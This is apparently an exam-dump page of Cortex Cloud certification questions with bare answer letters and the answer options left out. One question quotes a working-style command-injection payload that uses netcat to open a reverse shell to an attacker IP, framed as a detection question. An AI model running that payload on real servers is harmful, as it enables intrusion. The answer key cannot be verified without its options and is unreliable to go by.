What is the automated method for Cortex Cloud to organize both a report by cloud type and a compliance benchmark that contains critical compliance issues to track over a 30-day threshold?
Answer : D
How can a user determine the number of applications affected by a specific vulnerability and whether or not an endpoint agent is installed?
Answer : B
Which action can cloud workload protection (CWP) prevent?
Answer : D
A developer writes a serverless application to extract a field from a file in an S3 bucket. The Lambda function is assigned the S3FullAccess managed policy.
Refer to the scenario to answer this question:
The serverless function does not sanitize its inputs, and code is injected into it. This results in malware being downloaded by a backend API server which is supposed to receive the API key from the function.
Which two capabilities could the API server use to detect the malware? (Choose two.)
Answer : BC
What is a lightweight solution that provides runtime visibility into an OpenShift cluster?
Answer : D
Based on the image below, what are the potential attack tactics and techniques involved and indicators of compromise (IoCs) that suggest a privilege escalation attempt?
Answer : D
A user notices new Amazon EKS cluster endpoints connected to the Cortex Cloud console and wants to review the Cortex XDR agent YAML file used during deployment.
Where will the user find the file?
Answer : C
In which two instances is it appropriate to implement the Kubernetes Connector instead of the XDR Cloud agent? (Choose two.)
Answer : AC
A company intends to deploy an Amazon EKS cluster to migrate its current application to a containerized design pattern. The application resides on dedicated servers and is always online, and any amount of downtime will be costly. There is currently no security visibility into either environment.
Which strategy should be implemented to achieve the company’s goal?
Answer : D
An Ubuntu web server running Apache and PHP is compromised with the following command injection payload using Netcat to establish a direct connection back to the attacker machine: http://192.168.45.190/vuln.php?cmd=nc -e /bin/bash 192.168.45.161 4444
Which endpoint protection module would have prevented a successful connection had the Cloud Detection and Response (CDR) agent been installed on the server?
Answer : D
A DevSecOps team requires CVE visibility into developer code repositories, while the cloud security team requires CVE visibility into developer applications at runtime.
Which Cortex Cloud capability is unique to the cloud security team’s requirement?
Answer : C
A developer writes a serverless application to extract a field from a file in an S3 bucket. The Lambda function is assigned the S3FullAccess managed policy.
Refer to the scenario to answer this question:
Which capability of Cortex Cloud will detect the API key?
Answer : B
A developer writes a serverless application to extract a field from a file in an S3 bucket. The Lambda function is assigned the S3FullAccess managed policy.
Refer to the scenario to answer this question:
Assuming that a fix is available for the vulnerable requests library declared in the requirements.txt file, how would a user remediate this vulnerability from Cortex Cloud?
Answer : A
A company wants to centralize security findings from third-party security tools to prioritize remediation efforts.
Which two Application Security Posture Management (ASPM) features will achieve this integration and prioritization? (Choose two.)
Answer : CD
How does Cortex Cloud identify the risk of malicious code injection into a build pipeline?
Answer : A
Have any questions or issues ? Please dont hesitate to contact us